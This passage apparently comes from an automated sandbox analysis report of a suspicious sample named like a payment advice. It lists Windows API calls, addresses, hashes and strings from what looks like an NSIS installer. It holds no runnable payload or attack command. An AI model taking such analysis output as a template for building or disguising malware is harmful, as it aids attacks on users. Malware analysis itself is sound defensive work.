                                                                                                                                          • Instruction ID: ed67d3ceb40554f4a20f9fe4cecdec295417cbe43b6f72f0b7bb3cee00e3d4b7
                                                                                                                                          • Opcode Fuzzy Hash: 2203d86e9aedfb02f953f7f44e7e92c7d68489696ba88c708ebc1c14ae09885d
                                                                                                                                          • Instruction Fuzzy Hash: 037173B1A00209BFDB109F64DD45A6A7B69FB84315F00813AF705BA2D0C778AD51DF99
                                                                                                                                          APIs
                                                                                                                                          • lstrcpyW.KERNEL32(00425D70,NUL,?,00000000,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C18
                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C3C
                                                                                                                                          • GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C45
                                                                                                                                            • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
                                                                                                                                            • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
                                                                                                                                          • GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C62
                                                                                                                                          • wsprintfA.USER32 ref: 00405C80
                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CBB
                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CCA
                                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D02
                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D58
                                                                                                                                          • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D6A
                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00405D71
                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00405D78
                                                                                                                                            • Part of subcall function 00405B56: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405B5A
                                                                                                                                            • Part of subcall function 00405B56: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                                                                                          • String ID: %ls=%ls$NUL$[Rename]$p]B$peB
                                                                                                                                          • API String ID: 1265525490-3322868524
                                                                                                                                          • Opcode ID: 3c8f8921d5db17dcea38d37436245cad2ed6acf29c8dc53bbb3a8225ee1bc969
                                                                                                                                          • Instruction ID: dd28b8746f6bac9015e409c36d2f5baf321d2fce784c03eddf9b1c2e257c4ca8
                                                                                                                                          • Opcode Fuzzy Hash: 3c8f8921d5db17dcea38d37436245cad2ed6acf29c8dc53bbb3a8225ee1bc969
                                                                                                                                          • Instruction Fuzzy Hash: 9741E271604B19BBD2216B715C4DF6B3B6CEF41754F14453BBA01B62D2EA3CA8018EBD
                                                                                                                                          APIs
                                                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                          • DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                          • String ID: F
                                                                                                                                          • API String ID: 941294808-1304234792
                                                                                                                                          • Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                                                                                          • Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
                                                                                                                                          • Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                                                                                          • Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
                                                                                                                                          APIs
                                                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404619
                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00404643
                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 004046F4
                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 004046FF
                                                                                                                                          • lstrcmpiW.KERNEL32(00427180,004226D0,00000000,?,?), ref: 00404731
                                                                                                                                          • lstrcatW.KERNEL32(?,00427180), ref: 0040473D
                                                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474F
                                                                                                                                            • Part of subcall function 004056AA: GetDlgItemTextW.USER32(?,?,00000400,00404786), ref: 004056BD
                                                                                                                                            • Part of subcall function 0040617E: CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,75923420,00403512), ref: 004061E1
                                                                                                                                            • Part of subcall function 0040617E: CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                                                                            • Part of subcall function 0040617E: CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,75923420,00403512), ref: 004061F5
                                                                                                                                            • Part of subcall function 0040617E: CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,75923420,00403512), ref: 00406208
                                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 00404810
                                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040482B
                                                                                                                                          • SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048B1
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                                                                          • String ID: A
                                                                                                                                          • API String ID: 2246997448-3554254475
                                                                                                                                          • Opcode ID: 7bae5448d950fa7fc9b780a264b0000045a755fe0574635acf906d6e28ab15ff
                                                                                                                                          • Instruction ID: fc6e5784adbf23f3bf0ca4204261aafad130db7b69f5cfc08d06a9dfd3cb4e02
                                                                                                                                          • Opcode Fuzzy Hash: 7bae5448d950fa7fc9b780a264b0000045a755fe0574635acf906d6e28ab15ff
                                                                                                                                          • Instruction Fuzzy Hash: 1B916FB2900209ABDB11AFA1CC85AAF77B8EF85354F10847BF701B72D1D77C99418B69
                                                                                                                                          APIs
                                                                                                                                          • GetTickCount.KERNEL32 ref: 00402DD0
                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEC
                                                                                                                                            • Part of subcall function 00405B56: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405B5A
                                                                                                                                            • Part of subcall function 00405B56: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 00402E35
                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00409230), ref: 00402F7C
                                                                                                                                          Strings
                                                                                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403013
                                                                                                                                          • Inst, xrefs: 00402EA3
                                                                                                                                          • Null, xrefs: 00402EB5
                                                                                                                                          • soft, xrefs: 00402EAC
                                                                                                                                          • Error launching installer, xrefs: 00402E0C
                                                                                                                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC5
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                          • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                          • API String ID: 2803837635-787788815
                                                                                                                                          • Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                                                                                                          • Instruction ID: 37f794aabb7b6cc22e4429bd010eaec377b65274dead3bcbf73b1a6bf24b43e2
                                                                                                                                          • Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                                                                                                          • Instruction Fuzzy Hash: FB610571940205ABDB20AF65DD89BAE3AB8EB04359F20417BF505B32D1C7BC9E41DB9C
                                                                                                                                          APIs
                                                                                                                                          • GetVersion.KERNEL32(00000000,004216B0,?,004051CB,004216B0,00000000,00000000,00000000), ref: 00405FCF
                                                                                                                                          • GetSystemDirectoryW.KERNEL32(00427180,00000400), ref: 0040604D
                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(00427180,00000400), ref: 00406060
                                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609C
                                                                                                                                          • SHGetPathFromIDListW.SHELL32(?,00427180), ref: 004060AA
                                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 004060B5
                                                                                                                                          • lstrcatW.KERNEL32(00427180,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D9
                                                                                                                                          • lstrlenW.KERNEL32(00427180,00000000,004216B0,?,004051CB,004216B0,00000000,00000000,00000000), ref: 00406133
                                                                                                                                          Strings
                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040601B
                                                                                                                                          • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004060D3
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                          • API String ID: 900638850-730719616
                                                                                                                                          • Opcode ID: 6742d19b0b1c5090879c3cfba661a75a2238e305d4f85b0b169f5eea2b4c5ff0
                                                                                                                                          • Instruction ID: 201fcfe404e7502d8ff22bbbb8bc1db0d7d07a9235330109bbd625d5d43c8b09
                                                                                                                                          • Opcode Fuzzy Hash: 6742d19b0b1c5090879c3cfba661a75a2238e305d4f85b0b169f5eea2b4c5ff0
                                                                                                                                          • Instruction Fuzzy Hash: 93612371A40516EBDB209F24CC44AAF37A5EF00314F51813BE546BA2E0D73D8AA2CB4E
                                                                                                                                          APIs
                                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 004041B3
                                                                                                                                          • GetSysColor.USER32(00000000), ref: 004041CF
                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 004041DB
                                                                                                                                          • SetBkMode.GDI32(?,?), ref: 004041E7
                                                                                                                                          • GetSysColor.USER32(?), ref: 004041FA
                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 0040420A
                                                                                                                                          • DeleteObject.GDI32(?), ref: 00404224
                                                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 0040422E
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2320649405-0
                                                                                                                                          • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                                                          • Instruction ID: 80eb99ce468fafd782bf4c41e5e54efb1aa93a8fb2f83beca87368335cd0d861
                                                                                                                                          • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                                                          • Instruction Fuzzy Hash: B221C6B1904744ABCB219F68DD08B4B7BF8AF40710F04896DF951F26E1C738E944CB65
                                                                                                                                          APIs
                                                                                                                                          • ReadFile.KERNEL32(?,?,?,?), ref: 004025DB
                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
                                                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
                                                                                                                                            • Part of subcall function 00405BD9: ReadFile.KERNEL32(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330C,00409230,00409230,004031FE,00413E78,00004000,?,00000000,?), ref: 00405BED
                                                                                                                                            • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                                                                                          • String ID: 9
                                                                                                                                          • API String ID: 1149667376-2366072709
                                                                                                                                          • Opcode ID: 5bf3696fc1b43342bc1c7e4b21794d67987bb543e605c58fae928a8d5a7d4e33
                                                                                                                                          • Instruction ID: 2cb5264777941c8734ead6492e5e892e31f06070e548dc8493562ac8cc7c1c9a
                                                                                                                                          • Opcode Fuzzy Hash: 5bf3696fc1b43342bc1c7e4b21794d67987bb543e605c58fae928a8d5a7d4e33
                                                                                                                                          • Instruction Fuzzy Hash: B551E971E04209ABDF24DF94DE88AAEB779FF04304F50443BE501B62D0D7B99A42CB69
                                                                                                                                          APIs
                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                                                                                                          • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                                                                                                          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                                                                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3294113728-0
                                                                                                                                          • Opcode ID: 120950de23c25218e4c137f2e62925978e01813800c9cf407bd4cdabe4d04e4e
                                                                                                                                          • Instruction ID: c52f99eb37a0f9a93b384f1dc8ea19ce670fa72408cf6cd502fc0ac50d833161
                                                                                                                                          • Opcode Fuzzy Hash: 120950de23c25218e4c137f2e62925978e01813800c9cf407bd4cdabe4d04e4e
                                                                                                                                          • Instruction Fuzzy Hash: AC31A072C00118BBDF11AFA5CE49DAF7E79EF05364F20423AF510762E1C6796E418BA9
                                                                                                                                          APIs
                                                                                                                                          • lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                          • lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                          • lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                          • SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2531174081-0
                                                                                                                                          • Opcode ID: aabeaaca48730acbc73074f8e678aaac97ab8e564c9cd04649984117108eee2c
                                                                                                                                          • Instruction ID: f08454111491fc0d39351af24b8902c1f97f976603b555b028d64c931b302e29
                                                                                                                                          • Opcode Fuzzy Hash: aabeaaca48730acbc73074f8e678aaac97ab8e564c9cd04649984117108eee2c
                                                                                                                                          • Instruction Fuzzy Hash: 42219D71900518BACB119FA5DD84ADFBFB8EF44354F54807AF904B62A0C7798A41DFA8
                                                                                                                                          APIs
                                                                                                                                          • DestroyWindow.USER32(?,00000000), ref: 00402D35
                                                                                                                                          • GetTickCount.KERNEL32 ref: 00402D53
                                                                                                                                          • wsprintfW.USER32 ref: 00402D81
                                                                                                                                            • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                            • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                            • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                            • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                                                                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                                                                                                            • Part of subcall function 00402CFE: MulDiv.KERNEL32(?,00000064,?), ref: 00402D13
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                          • String ID: ... %d%%
                                                                                                                                          • API String ID: 722711167-2449383134
                                                                                                                                          • Opcode ID: 37da5e6e22464c23d40ec4d31b3b8eabf55409bf9acffd0f2ef74a8860773cf4
                                                                                                                                          • Instruction ID: 10fb19a6c4b2eae8d62923eb178f02f9fc5b3c6af7becd3ce095817841e91703
                                                                                                                                          • Opcode Fuzzy Hash: 37da5e6e22464c23d40ec4d31b3b8eabf55409bf9acffd0f2ef74a8860773cf4
                                                                                                                                          • Instruction Fuzzy Hash: 2901A130949220EBD7626B60AF1DAEA3B68EF01704F1445BBF901B11E0C6FC9D01CA9E
                                                                                                                                          APIs
                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A79
                                                                                                                                          • GetMessagePos.USER32 ref: 00404A81
                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00404A9B
                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAD
                                                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD3
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                                          • String ID: f
                                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                                          • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                                                          • Instruction ID: cab112d5f89b67c13374b27971796476edbf79a01bfb7ffc6895eaaae0ed81f2
                                                                                                                                          • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                                                          • Instruction Fuzzy Hash: 1C014C71E40219BADB00DB94DD85BFEBBB8AB55715F10012ABB11B61C0C7B4A9018BA5
                                                                                                                                          APIs
